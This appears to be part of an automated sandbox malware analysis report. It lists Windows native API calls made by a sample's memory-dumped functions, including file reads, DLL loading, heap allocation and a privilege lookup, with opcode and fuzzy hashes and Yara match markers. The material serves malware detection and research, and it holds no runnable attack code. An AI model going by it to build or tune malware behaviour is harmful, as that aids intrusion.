NtCreateFile.NTDLL(00000060,00000005,00000000,004188A3,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,004188A3,00000000,00000005,00000060,00000000,00000000), ref: 0041DF74

Memory Dump Source

Source File: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_401000_CV.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
Instruction ID: 6448dc9dfb06a7df39d3f30f3df42fa8d08c553967d1b20781daee69f9e3092e
Opcode Fuzzy Hash: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
Instruction Fuzzy Hash: C1F0CFB2204208AFCB08CF89DC85EEB37EDAF8C754F018208BA0D97241C630F851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041DFD7 Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(00418A67,00413D43,FFFFFFFF,00418551,00000206,?,00418A67,00000206,00418551,FFFFFFFF,00413D43,00418A67,00000206,00000000), ref: 0041E01C

Memory Dump Source

Source File: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_401000_CV.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
Instruction ID: 7ac33d83bb922e9e5799d918d2943a80d62de890c863425acbc82b33401cc25d
Opcode Fuzzy Hash: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
Instruction Fuzzy Hash: 7BF0A4B6200108ABCB14DF89DC85EEB77ADAF8C754F118249BE0D97241D630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041E057 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00418A45,00000206,?,00418A45,00000005,FFFFFFFF), ref: 0041E07C

Memory Dump Source

Source File: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_401000_CV.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
Instruction ID: b1d8fcc69f06d017c176d88ed9b5d0463e7edbaf1fdeccb5b0e24cd72fb2058f
Opcode Fuzzy Hash: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
Instruction Fuzzy Hash: 47D01776204214ABD614EBA9DC89FD77BACDF48664F014555BA0D5B242C630FA008BE0

Uniqueness

Uniqueness Score: -1.00%

Function 01289910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128991A

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 99b20a3dcd8229d0b138a49aa25cc3750b80a2d0ed72209e66b53f60d89a72db
Instruction ID: 261edd90a4a777195f54ef4234f69453cb68994b95e4f80f7fde94b1afc55485
Opcode Fuzzy Hash: 99b20a3dcd8229d0b138a49aa25cc3750b80a2d0ed72209e66b53f60d89a72db
Instruction Fuzzy Hash: FD9002B121104802D64071AD45047460005A7D0341F51C011A5054554EC6998DD577B5

Uniqueness

Uniqueness Score: -1.00%

Function 01289540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128954A

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8b20f02cee1705eecbb7ab31701fe5420bac7a03640a54179e304102ce548d33
Instruction ID: 076f5eb1be0439a962e38ff9f4c029e8e1c0cae7262416410cff852533966a9e
Opcode Fuzzy Hash: 8b20f02cee1705eecbb7ab31701fe5420bac7a03640a54179e304102ce548d33
Instruction Fuzzy Hash: C9900265221044030605A5AD07045070046A7D5391351C021F1005550CD6618C617271

Uniqueness

Uniqueness Score: -1.00%

Function 012899A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012899AA

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1893a86695b41816ef6511322d7802dad687201347bbdcac5645dc615c55782c
Instruction ID: 4b5f0c995b7ea68632f8657dbe331c7df62a18d9ffdc96131df4dd9da9c696ef
Opcode Fuzzy Hash: 1893a86695b41816ef6511322d7802dad687201347bbdcac5645dc615c55782c
Instruction Fuzzy Hash: C89002A135104842D60061AD4514B060005E7E1341F51C015E1054554DC659CC527276

Uniqueness

Uniqueness Score: -1.00%

Function 012895D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012895DA

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cbe3432b2bdd0157e1328062a0ed72add559594de10c1bf2f8875daba86e5f40
Instruction ID: 3780100c082ff7efa4daa5cbb73506548c6fcc3829596cc46f3001a656fd950c
Opcode Fuzzy Hash: cbe3432b2bdd0157e1328062a0ed72add559594de10c1bf2f8875daba86e5f40
Instruction Fuzzy Hash: 459002A121204403460571AD4514616400AA7E0241B51C021E1004590DC5658C917275

Uniqueness

Uniqueness Score: -1.00%

Function 01289860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128986A

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5ed3b6f50f604dd2cb4eb6a3f65745c02189aaf926bc30eb6ee98b6f9c0c756a
Instruction ID: d1d26d22201ad7e5714855f283422ce74ea3a7335975e53633dfd01196702ded
Opcode Fuzzy Hash: 5ed3b6f50f604dd2cb4eb6a3f65745c02189aaf926bc30eb6ee98b6f9c0c756a
Instruction Fuzzy Hash: B790027121104813D61161AD46047070009A7D0281F91C412A0414558DD6968D52B271

Uniqueness

Uniqueness Score: -1.00%

Function 01289840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128984A

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 495017bb317a68e8a7f13dbc3957cfeea25f7aecd1103e3b276fbd06b198d4da
Instruction ID: e0a1fd070c05c18c2bd268853e37b7be594cf47e52bab704996cb86b00ad05b8
Opcode Fuzzy Hash: 495017bb317a68e8a7f13dbc3957cfeea25f7aecd1103e3b276fbd06b198d4da
Instruction Fuzzy Hash: D4900261252085525A45B1AD45045074006B7E0281791C012A1404950CC5669C56F771

Uniqueness

Uniqueness Score: -1.00%

Function 012898F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012898FA

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c3c53834ffcce21b56256ae01badb431422ea63bbfca9190ecb6a2507853e27d
Instruction ID: 9df6aaa38acd3258ff4fcdc6e026050e581f4bf2496267432509d8d997d7d0b2
Opcode Fuzzy Hash: c3c53834ffcce21b56256ae01badb431422ea63bbfca9190ecb6a2507853e27d
Instruction Fuzzy Hash: 3D90026161104902D60171AD4504616000AA7D0281F91C022A1014555ECA658D92B271

Uniqueness

Uniqueness Score: -1.00%

Function 01289710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128971A

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7555b1ffc71de4ffddbb37ec512d4a32f6153a5034b14869ab15e14ff964f889
Instruction ID: 99d8afedd5744a8dfc1395879c40f88e76662788a75bbdb3fd105cf9428736cf
Opcode Fuzzy Hash: 7555b1ffc71de4ffddbb37ec512d4a32f6153a5034b14869ab15e14ff964f889
Instruction Fuzzy Hash: D990027121104802D60065ED55086460005A7E0341F51D011A5014555EC6A58C917271

Uniqueness

Uniqueness Score: -1.00%

Function 012897A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012897AA

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a15f42ebb1e5623ba5927eab4860a4419c6d3d42a9687a9d469598def4d20a4f
Instruction ID: e691067171bc0d227c19bc5b42614706ac5f49253a91f631c819b7e2408f5d44
Opcode Fuzzy Hash: a15f42ebb1e5623ba5927eab4860a4419c6d3d42a9687a9d469598def4d20a4f
Instruction Fuzzy Hash: BE90026131104403D64071AD55186064005F7E1341F51D011E0404554CD9558C567372

Uniqueness

Uniqueness Score: -1.00%

Function 01289780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128978A

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 37c60830dbdaa6b971f81233fea27411d96a444ca4495e24e571bef9062911f6
Instruction ID: 09c326399ff9cdf037e8cf80dfcbd3b101c01b3c02d5b1c6be7940af99dc4395
Opcode Fuzzy Hash: 37c60830dbdaa6b971f81233fea27411d96a444ca4495e24e571bef9062911f6
Instruction Fuzzy Hash: C990026922304402D68071AD550860A0005A7D1242F91D415A0005558CC9558C697371

Uniqueness

Uniqueness Score: -1.00%

Function 01289FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01289FEA

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e91ae3e92e58a4ca55a0eb5c639099fce3468ae2a02c7ca63bee3798e8481d37
Instruction ID: 31ea8e7553e0eae5d9f0934a57ca9ad99b17186d54acdf2eeb735dc4580e08af
Opcode Fuzzy Hash: e91ae3e92e58a4ca55a0eb5c639099fce3468ae2a02c7ca63bee3798e8481d37
Instruction Fuzzy Hash: 3890027132118802D61061AD85047060005A7D1241F51C411A0814558DC6D58C917272

Uniqueness

Uniqueness Score: -1.00%

Function 01289A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01289A2A

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d48888cbff97348eaa24cc353c79514f9f4579c2e8002af2d4b7c33670f16a37
Instruction ID: 5e5e43f6798dd8cb72697c35e701a31515de4d5cfebefebc4b7e8126092e4efd
Opcode Fuzzy Hash: d48888cbff97348eaa24cc353c79514f9f4579c2e8002af2d4b7c33670f16a37
Instruction Fuzzy Hash: E090026161104442464071BD89449064005BBE1251751C121A0988550DC5998C6577B5

Uniqueness

Uniqueness Score: -1.00%

Function 01289A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01289A0A

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7e83da7a01436419310071130996826245898b0893d403f43f655d2183cd664d
Instruction ID: 576991d0ceaea275e8903a412ab1921f37979f544c1391bd188226a0e38c761b
Opcode Fuzzy Hash: 7e83da7a01436419310071130996826245898b0893d403f43f655d2183cd664d
Instruction Fuzzy Hash: 8490027121144802D60061AD491470B0005A7D0342F51C011A1154555DC6658C5176B1

Uniqueness

Uniqueness Score: -1.00%

Function 01289660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128966A

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c54e6ae5dbd60500586b6397c8b41247c9af06935a7dddc7af7264e3d10eb529
Instruction ID: 7115e7203d327d909a0caa1c2696f8c475988533c43e42100b7c40e618f26e4a
Opcode Fuzzy Hash: c54e6ae5dbd60500586b6397c8b41247c9af06935a7dddc7af7264e3d10eb529
Instruction Fuzzy Hash: 4090027121104C02D68071AD450464A0005A7D1341F91C015A0015654DCA558E5977F1

Uniqueness

Uniqueness Score: -1.00%

Function 01289A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01289A5A

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 833193361c244fe3f1e29cbd2836e0c3c9cea57f9b5d1753d288358d36825a33
Instruction ID: 6453066b417289cb97f0aaa5f77f336fffb61de313eca1de9c9d8078e86ea8ed
Opcode Fuzzy Hash: 833193361c244fe3f1e29cbd2836e0c3c9cea57f9b5d1753d288358d36825a33
Instruction Fuzzy Hash: 3C90026122184442D70065BD4D14B070005A7D0343F51C115A0144554CC9558C617671

Uniqueness

Uniqueness Score: -1.00%

Function 012896E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012896EA

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2e99d5a76a5e08125f264cdcf7793ef420dd50dd6ea7437e1da73c89a438f012
Instruction ID: 299958927149c7ca006bad74cb1ae4ca6fbc0841315f658ec8fc1d18038ef8ca
Opcode Fuzzy Hash: 2e99d5a76a5e08125f264cdcf7793ef420dd50dd6ea7437e1da73c89a438f012
Instruction Fuzzy Hash: 949002712110CC02D61061AD850474A0005A7D0341F55C411A4414658DC6D58C917271

Uniqueness

Uniqueness Score: -1.00%

Function 0041E26C Relevance: 3.1, APIs: 2, Instructions: 60
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(004181FD,?,004189A4,004189A4,?,004181FD,?,?,?,?,?,00000000,00000005,00000206), ref: 0041E224
ExitProcess.KERNEL32(?,00000000,00000008,?,?,00000001), ref: 0041E29F

Memory Dump Source

Source File: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_401000_CV.jbxd

Yara matches

Similarity

API ID: AllocateExitHeapProcess
String ID:
API String ID: 1054155344-0
Opcode ID: ee17ec62d05784afc4d66e94be3c9995cf8fe2a23d54d256d91ec0999d487b05
Instruction ID: 0668d67976d12f15bc98a659857f25fbd9df60f90ff407b55574b8c3bb8b3b33
Opcode Fuzzy Hash: ee17ec62d05784afc4d66e94be3c9995cf8fe2a23d54d256d91ec0999d487b05
Instruction Fuzzy Hash: B101ADB92041146BDB14DF95DC85EE77BACEF88304F108A9DFD9D9B242C538E912C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00408ECA Relevance: 1.7, APIs: 1, Instructions: 196
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00408EA1

Memory Dump Source

Source File: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_401000_CV.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 5642629fd59658b6f1ab36aa169b952dcebe14d414064c8778be905fb2c0dd79
Instruction ID: 3279a1b336e480c524eb5f8c3dc0e247a319f97aee01254a06d5bed20130259b
Opcode Fuzzy Hash: 5642629fd59658b6f1ab36aa169b952dcebe14d414064c8778be905fb2c0dd79
Instruction Fuzzy Hash: 4C61F6B0900209AFDB24DF21CC85FEB77A8EF48304F00057EF949A7281DB786941CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408E47 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00408EA1

Memory Dump Source

Source File: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_401000_CV.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 704dcaa2dff8d0e8592498276fd3a72e7310e200dc9a0b2c264eba20c2deeba9
Instruction ID: e0e97e31f2f927fc2e4134359399ff9cb5c43eb43835cb9a12d8b601842f95b9
Opcode Fuzzy Hash: 704dcaa2dff8d0e8592498276fd3a72e7310e200dc9a0b2c264eba20c2deeba9
Instruction Fuzzy Hash: CC01AC71A8022877E720A6959C43FFE776C5B40B55F04412EFF04FA1C1EAA8790687E9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3D7 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040C449

Memory Dump Source

Source File: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_401000_CV.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 1810398db8494b9492cdab0e533ae546dc1ad7b03bfe1bff3b91655df341ed49
Instruction ID: 5f162280d857614098302719a640af2808658dc7a983362ac7032cebc4b5d2eb
Opcode Fuzzy Hash: 1810398db8494b9492cdab0e533ae546dc1ad7b03bfe1bff3b91655df341ed49
Instruction Fuzzy Hash: 3E0152B5E4010DE7DF10DBA5DC42FEEB3B8AF14304F1042A5E908A7281F635EB588B55

Uniqueness

Uniqueness Score: -1.00%

Function 0041E1F7 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(004181FD,?,004189A4,004189A4,?,004181FD,?,?,?,?,?,00000000,00000005,00000206), ref: 0041E224

Memory Dump Source

Source File: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_401000_CV.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
Instruction ID: b7217d4b9aff619b6b878caa81aca477790b10bf4cb31abdb49de01a6c2d5899
Opcode Fuzzy Hash: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
Instruction Fuzzy Hash: 1AE046B5200218ABDB18EF9ADC45EE73BACEF88754F018559FE095B242C630F910CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041E237 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041E264

Memory Dump Source

Source File: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_401000_CV.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
Instruction ID: c815c5cd5324823e81fc1c38a3d6d0c221f073dc52b94a92161811f6f07a444f
Opcode Fuzzy Hash: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
Instruction Fuzzy Hash: 1AE04FB52002146BD714DF49DC49ED73BACEF88754F014555FE0957242C530F914CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041E397 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F459,0040F459,?,00000000,?,?), ref: 0041E3C7

Memory Dump Source

Source File: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_401000_CV.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
Instruction ID: 0d009a4c28d2e78ee797871a9d3a0966a65aa83071acb2bdb2e4229ed7fd4aeb
Opcode Fuzzy Hash: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
Instruction Fuzzy Hash: A1E01AB52002186BD710DF49CC45EE737ADAF88654F118559BE0957242C630F8108AB5

Uniqueness

Uniqueness Score: -1.00%

Function 0040F607 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserGeoID.KERNELBASE(00000010), ref: 0040F631

Memory Dump Source

Source File: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_401000_CV.jbxd

Yara matches

Similarity

API ID: User
String ID:
API String ID: 765557111-0
Opcode ID: 098092a5b174b6016a6d6d14e368ec7c8df7cb00201bb95c480524714d0f880c
Instruction ID: 64f4f88a1e500bd3db0c207901f6fe7ca601b6fa1c6f2b1f57a8cafaf1d8c564
Opcode Fuzzy Hash: 098092a5b174b6016a6d6d14e368ec7c8df7cb00201bb95c480524714d0f880c
Instruction Fuzzy Hash: 55E02B7338030827F630D1E58C43FB6324E9B84704F048474F90CE73C1D5A9F9804018

Uniqueness

Uniqueness Score: -1.00%

Function 0041E277 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,00000000,00000008,?,?,00000001), ref: 0041E29F

Memory Dump Source

Source File: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_401000_CV.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
